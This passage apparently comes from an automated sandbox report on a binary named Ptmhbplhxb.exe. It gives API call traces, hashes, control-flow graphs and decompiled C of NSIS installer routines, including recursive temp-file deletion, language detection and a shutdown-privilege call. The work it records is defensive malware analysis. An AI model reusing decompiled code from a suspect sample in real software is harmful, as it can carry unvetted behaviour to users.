                • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403437
                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403448
                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403450
                • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403464
                  • Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
                  • Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
                  • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,Setup Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                  • Part of subcall function 004037B5: GetUserDefaultUILanguage.KERNELBASE(00000002,772EFA90,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ptmhbplhxb.exe",00000000), ref: 004037CF
                  • Part of subcall function 004037B5: lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,772EFA90), ref: 004038A5
                  • Part of subcall function 004037B5: lstrcmpiA.KERNEL32(?,.exe,0042E3A0,?,?,?,0042E3A0,00000000,00435400,1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000), ref: 004038B8
                  • Part of subcall function 004037B5: GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038C3
                  • Part of subcall function 004037B5: LoadImageA.USER32 ref: 0040390C
                  • Part of subcall function 004037B5: RegisterClassA.USER32 ref: 00403949
                • ExitProcess.KERNEL32(?,?,00000006,00000008,0000000A), ref: 0040350D
                  • Part of subcall function 004036DB: CloseHandle.KERNEL32(FFFFFFFF,00403512,?,?,00000006,00000008,0000000A), ref: 004036E6
                • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403512
                • ExitProcess.KERNEL32 ref: 00403533
                • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403650
                • OpenProcessToken.ADVAPI32(00000000), ref: 00403657
                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040366F
                • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 0040368E
                • ExitWindowsEx.USER32(00000002,80040002), ref: 004036B2
                • ExitProcess.KERNEL32 ref: 004036D5
                  • Part of subcall function 00405681: MessageBoxIndirectA.USER32 ref: 004056DC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Process$Exit$FileHandle$EnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpilstrcpyn
                • String ID: "$"C:\Users\user\Desktop\Ptmhbplhxb.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp$C:\Users\user\Desktop$C:\Users\user\Desktop\Ptmhbplhxb.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$Setup Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                • API String ID: 3861850387-697963099
                • Opcode ID: 43770b6c325a099cedcf9499065752b98bf324a98eae67160cb2c941fe278442
                • Instruction ID: 41c275c355797b12fd9b138c60a2ad170ddd3a1f93bd6a9867a2704463122372
                • Opcode Fuzzy Hash: 43770b6c325a099cedcf9499065752b98bf324a98eae67160cb2c941fe278442
                • Instruction Fuzzy Hash: 0DC1E470604741AAD7216F759E49B2F3EACAF45706F44053FF581B61E2CB7C8A098B2E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040572D Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159filestringCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 272 40572d-405753 call 4059eb 275 405755-405767 DeleteFileA 272->275 276 40576c-405773 272->276 277 4058f6-4058fa 275->277 278 405775-405777 276->278 279 405786-405796 call 405f65 276->279 281 4058a4-4058a9 278->281 282 40577d-405780 278->282 285 4057a5-4057a6 call 405944 279->285 286 405798-4057a3 lstrcatA 279->286 281->277 284 4058ab-4058ae 281->284 282->279 282->281 287 4058b0-4058b6 284->287 288 4058b8-4058c0 call 406268 284->288 289 4057ab-4057ae 285->289 286->289 287->277 288->277 296 4058c2-4058d6 call 4058fd call 4056e5 288->296 292 4057b0-4057b7 289->292 293 4057b9-4057bf lstrcatA 289->293 292->293 295 4057c4-4057e2 lstrlenA FindFirstFileA 292->295 293->295 298 4057e8-4057ff call 405928 295->298 299 40589a-40589e 295->299 308 4058d8-4058db 296->308 309 4058ee-4058f1 call 40508c 296->309 306 405801-405805 298->306 307 40580a-40580d 298->307 299->281 301 4058a0 299->301 301->281 306->307 310 405807 306->310 311 405820-40582e call 405f65 307->311 312 40580f-405814 307->312 308->287 316 4058dd-4058ec call 40508c call 405d44 308->316 309->277 310->307 322 405830-405838 311->322 323 405845-405850 call 4056e5 311->323 313 405816-405818 312->313 314 405879-40588b FindNextFileA 312->314 313->311 318 40581a-40581e 313->318 314->298 320 405891-405894 FindClose 314->320 316->277 318->311 318->314 320->299 322->314 325 40583a-405843 call 40572d 322->325 332 405871-405874 call 40508c 323->332 333 405852-405855 323->333 325->314 332->314 335 405857-405867 call 40508c call 405d44 333->335 336 405869-40586f 333->336 335->314 336->314
                C-Code - Quality: 98%
                			E0040572D(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E004059EB(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4a8 =  *0x42f4a8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00405F65(0x42b878, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405944(_t73);
					} else {
						lstrcatA(0x42b878, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]); // executed
						_t40 = FindFirstFileA(0x42b878,  &_v336); // executed
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405928( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00405F65(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004056E5(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040508C(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4a8 =  *0x42f4a8 + 1;
										} else {
											E0040508C(0xfffffff1, _t73);
											E00405D44(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040572D(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336); // executed
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b878 - 0x5c;
					if( *0x42b878 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E00406268(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E004058FD(_t73);
							_t40 = E004056E5(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040508C(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040508C(0xfffffff1, _t73);
							return E00405D44(_t72, _t73, 0);
						}
						L33:
						 *0x42f4a8 =  *0x42f4a8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                0x00405737
                0x0040573c
                0x00405745
                0x00405748
                0x00405750
                0x00405753
                0x00405756
                0x0040575e
                0x00405760
                0x00405761
                0x00000000
                0x00405761
                0x0040576c
                0x0040576f
                0x0040576f
                0x0040576f
                0x00405773
                0x00405786
                0x0040578d
                0x00405792
                0x00405796
                0x004057a6
                0x00405798
                0x0040579e
                0x0040579e
                0x004057ab
                0x004057ae
                0x004057b9
                0x004057bf
                0x004057c4
                0x004057d4
                0x004057d6
                0x004057dc
                0x004057df
                0x004057e2
                0x0040589a
                0x0040589a
                0x0040589e
                0x004058a0
                0x004058a0
                0x004058a0
                0x004058a0
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004057e8
                0x004057e8
                0x004057f1
                0x004057f7
                0x004057fc
                0x004057ff
                0x00405801
                0x00405805
                0x00405807
                0x00405807
                0x00405805
                0x0040580a
                0x0040580d
                0x00405820
                0x00405822
                0x00405827
                0x0040582e
                0x00405849
                0x0040584e
                0x00405850
                0x00405874
                0x00405852
                0x00405852
                0x00405855
                0x00405869
                0x00405857
                0x0040585a
                0x00405862
                0x00405862
                0x00405855
                0x00405830
                0x00405836
                0x00405838
                0x0040583e
                0x0040583e
                0x00405838
                0x00000000
                0x0040582e
                0x0040580f
                0x00405812
                0x00405814
                0x00000000
                0x00000000
                0x00405816
                0x00405818
                0x00000000
                0x00000000
                0x0040581a
                0x0040581e
                0x00000000
                0x00000000
                0x00000000
                0x00405879
                0x00405883
                0x00405889
                0x00405889
                0x00405894
                0x00000000
                0x00405894
                0x004057b0
                0x004057b7
                0x00000000
                0x00000000
                0x00000000
                0x00405775
                0x00405775
                0x00405777
                0x004058a4
                0x004058a6
                0x004058a9
                0x004058fa
                0x004058fa
                0x004058fa
                0x004058ab
                0x004058ae
                0x004058b9
                0x004058be
                0x004058c0
                0x00000000
                0x00000000
                0x004058c3
                0x004058cf
                0x004058d4
                0x004058d6
                0x00000000
                0x004058f1
                0x004058d8
                0x004058db
                0x00000000
                0x00000000
                0x004058e0
                0x00000000
                0x004058e7
                0x004058b0
                0x004058b0
                0x00000000
                0x004058b0
                0x0040577d
                0x00405780
                0x00000000
                0x00000000
                0x00000000
                0x00405780

                APIs
                • DeleteFileA.KERNELBASE(?,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405756
                • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\*.*,\*.*,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\*.*,?,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 0040579E
                • lstrcatA.KERNEL32(?,0040A014,?,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\*.*,?,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004057BF
                • lstrlenA.KERNEL32(?,?,0040A014,?,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\*.*,?,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004057C5
                • FindFirstFileA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\*.*,?,?,?,0040A014,?,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\*.*,?,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004057D6
                • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405883
                • FindClose.KERNEL32(00000000), ref: 00405894
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                • String ID: "C:\Users\user\Desktop\Ptmhbplhxb.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\*.*$\*.*
                • API String ID: 2035342205-994912435
                • Opcode ID: 5a75186390c9518ef53bc7868eb0b51ef72d35058a64af47be824dbaeb8436d1
                • Instruction ID: 2a0351abb2716448ee460da7bfccfa5d3c7c3698b554042fcfc8e424752a7a40
                • Opcode Fuzzy Hash: 5a75186390c9518ef53bc7868eb0b51ef72d35058a64af47be824dbaeb8436d1
                • Instruction Fuzzy Hash: 2551B132900A04AAEF217B268C45FBF7A78DF42754F14817BF841B61D1D73C8952DEA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 583 406268-40627c FindFirstFileA 584 406289 583->584 585 40627e-406287 FindClose 583->585 586 40628b-40628c 584->586 585->586
                C-Code - Quality: 100%
                			E00406268(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0c0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0c0;
			}




                0x00406273
                0x0040627c
                0x00000000
                0x00406289
                0x0040627f
                0x00000000

                APIs
                • FindFirstFileA.KERNELBASE(772EFA90,0042C0C0,C:\,00405A2E,C:\,C:\,00000000,C:\,C:\,772EFA90,?,C:\Users\user~1\AppData\Local\Temp\,0040574D,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\), ref: 00406273
                • FindClose.KERNEL32(00000000), ref: 0040627F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Find$CloseFileFirst
                • String ID: C:\
                • API String ID: 2295610775-3404278061
                • Opcode ID: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                • Instruction ID: e0279db6a2f9a876ecb4b02bc738002a428a13ad585e0dc9357aaf1afb57e826
                • Opcode Fuzzy Hash: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                • Instruction Fuzzy Hash: 9DD012365060209FC25027786D0C85B7A589F053317118B7FF8AAF21E0C7348CA386DC
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004037B5 Relevance: 44.0, APIs: 14, Strings: 11, Instructions: 215stringregistryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 132 4037b5-4037cd call 4062fd 135 4037e1-403812 call 405e4c 132->135 136 4037cf-4037da GetUserDefaultUILanguage call 405ec3 132->136 142 403814-403825 call 405e4c 135->142 143 40382a-403830 lstrcatA 135->143 139 4037df 136->139 141 403835-40385e call 403a7a call 4059eb 139->141 149 403864-403869 141->149 150 4038e5-4038ed call 4059eb 141->150 142->143 143->141 149->150 152 40386b-40388f call 405e4c 149->152 156 4038fb-403920 LoadImageA 150->156 157 4038ef-4038f6 call 405f87 150->157 152->150 158 403891-403893 152->158 160 4039a1-4039a9 call 40140b 156->160 161 403922-403952 RegisterClassA 156->161 157->156 162 4038a4-4038b0 lstrlenA 158->162 163 403895-4038a2 call 405928 158->163 174 4039b3-4039be call 403a7a 160->174 175 4039ab-4039ae 160->175 164 403a70 161->164 165 403958-40399c SystemParametersInfoA CreateWindowExA 161->165 169 4038b2-4038c0 lstrcmpiA 162->169 170 4038d8-4038e0 call 4058fd call 405f65 162->170 163->162 168 403a72-403a79 164->168 165->160 169->170 173 4038c2-4038cc GetFileAttributesA 169->173 170->150 177 4038d2-4038d3 call 405944 173->177 178 4038ce-4038d0 173->178 184 4039c4-4039de ShowWindow call 40628f 174->184 185 403a47-403a4f call 40515e 174->185 175->168 177->170 178->170 178->177 190 4039e0-4039e5 call 40628f 184->190 191 4039ea-4039fc GetClassInfoA 184->191 192 403a51-403a57 185->192 193 403a69-403a6b call 40140b 185->193 190->191 196 403a14-403a45 DialogBoxParamA call 40140b call 403705 191->196 197 4039fe-403a0e GetClassInfoA RegisterClassA 191->197 192->175 198 403a5d-403a64 call 40140b 192->198 193->164 196->168 197->196 198->175
                C-Code - Quality: 96%
                			E004037B5(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f414;
				_t17 = E004062FD(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a870;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00405E4C(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a870, 0);
					__eflags =  *0x42a870;
					if(__eflags == 0) {
						E00405E4C(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040835A, 0x42a870, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00405EC3("1033", _t67 & 0x0000ffff);
				}
				E00403A7A(_t71, _t84);
				 *0x42f4a0 =  *0x42f41c & 0x00000020;
				 *0x42f4bc = 0x10000;
				if(E004059EB(_t84, 0x435400) != 0) {
					L16:
					if(E004059EB(_t92, 0x435400) == 0) {
						E00405F87(0, _t74, _t76, 0x435400,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f400, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42ebe8 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403A7A(_t71, __eflags);
							__eflags =  *0x42f4c0;
							if( *0x42f4c0 != 0) {
								_t28 = E0040515E(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ebcc; // 0x1
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a850, 5);
							_t34 = E0040628F("RichEd20");
							__eflags = _t34;
							if(_t34 == 0) {
								E0040628F("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42eba0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42eba0);
								 *0x42ebc4 = _t81;
								RegisterClassA(0x42eba0);
							}
							_t36 =  *0x42ebe0; // 0x0
							_t39 = DialogBoxParamA( *0x42f400, _t36 + 0x00000069 & 0x0000ffff, 0, E00403B52, 0);
							E00403705(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f400;
						 *0x42eba4 = E00401000;
						 *0x42ebb0 =  *0x42f400;
						 *0x42ebb4 = _t25;
						 *0x42ebc4 = 0x40a1f4;
						if(RegisterClassA(0x42eba0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a850 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f400, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3a0;
					E00405E4C(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f458, 0x42e3a0, 0);
					_t57 =  *0x42e3a0; // 0x31
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3a1;
						 *((char*)(E00405928(0x42e3a1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00405F65(0x435400, E004058FD(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405944(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}


























                0x004037bb
                0x004037c4
                0x004037cb
                0x004037cd
                0x004037e1
                0x004037f3
                0x004037fa
                0x00403801
                0x00403807
                0x0040380c
                0x00403812
                0x00403825
                0x00403825
                0x00403830
                0x004037cf
                0x004037cf
                0x004037da
                0x004037da
                0x00403835
                0x00403848
                0x0040384d
                0x0040385e
                0x004038e5
                0x004038ed
                0x004038f6
                0x004038f6
                0x0040390c
                0x00403912
                0x00403920
                0x004039a1
                0x004039a9
                0x004039b3
                0x004039b8
                0x004039be
                0x00403a48
                0x00403a4d
                0x00403a4f
                0x00403a6b
                0x00000000
                0x00403a6b
                0x00403a51
                0x00403a57
                0x00403a5f
                0x00403a5f
                0x00000000
                0x00403a57
                0x004039cc
                0x004039d7
                0x004039dc
                0x004039de
                0x004039e5
                0x004039e5
                0x004039f0
                0x004039f8
                0x004039fa
                0x004039fc
                0x00403a05
                0x00403a08
                0x00403a0e
                0x00403a0e
                0x00403a14
                0x00403a2d
                0x00403a3e
                0x00000000
                0x00403a43
                0x004039ab
                0x004039ad
                0x00000000
                0x00403922
                0x00403922
                0x0040392e
                0x00403938
                0x0040393e
                0x00403943
                0x00403952
                0x00403a70
                0x00403a70
                0x00000000
                0x00403a70
                0x00403961
                0x0040399c
                0x00000000
                0x0040399c
                0x00403864
                0x00403864
                0x00403867
                0x00403869
                0x00000000
                0x00000000
                0x00403873
                0x00403883
                0x00403888
                0x0040388f
                0x00000000
                0x00000000
                0x00403893
                0x00403895
                0x004038a2
                0x004038a2
                0x004038aa
                0x004038b0
                0x004038d8
                0x004038e0
                0x00000000
                0x004038c2
                0x004038c3
                0x004038cc
                0x004038d2
                0x004038d3
                0x00000000
                0x004038d3
                0x004038ce
                0x004038d0
                0x00000000
                0x00000000
                0x00000000
                0x004038d0
                0x004038b0

                APIs
                  • Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
                  • Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
                • GetUserDefaultUILanguage.KERNELBASE(00000002,772EFA90,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ptmhbplhxb.exe",00000000), ref: 004037CF
                  • Part of subcall function 00405EC3: wsprintfA.USER32 ref: 00405ED0
                • lstrcatA.KERNEL32(1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,772EFA90,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ptmhbplhxb.exe",00000000), ref: 00403830
                • lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,772EFA90), ref: 004038A5
                • lstrcmpiA.KERNEL32(?,.exe,0042E3A0,?,?,?,0042E3A0,00000000,00435400,1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000), ref: 004038B8
                • GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038C3
                • LoadImageA.USER32 ref: 0040390C
                • RegisterClassA.USER32 ref: 00403949
                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403961
                • CreateWindowExA.USER32 ref: 00403996
                • ShowWindow.USER32(00000005,00000000), ref: 004039CC
                • GetClassInfoA.USER32 ref: 004039F8
                • GetClassInfoA.USER32 ref: 00403A05
                • RegisterClassA.USER32 ref: 00403A0E
                • DialogBoxParamA.USER32 ref: 00403A2D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                • String ID: "C:\Users\user\Desktop\Ptmhbplhxb.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                • API String ID: 606308-2846193977
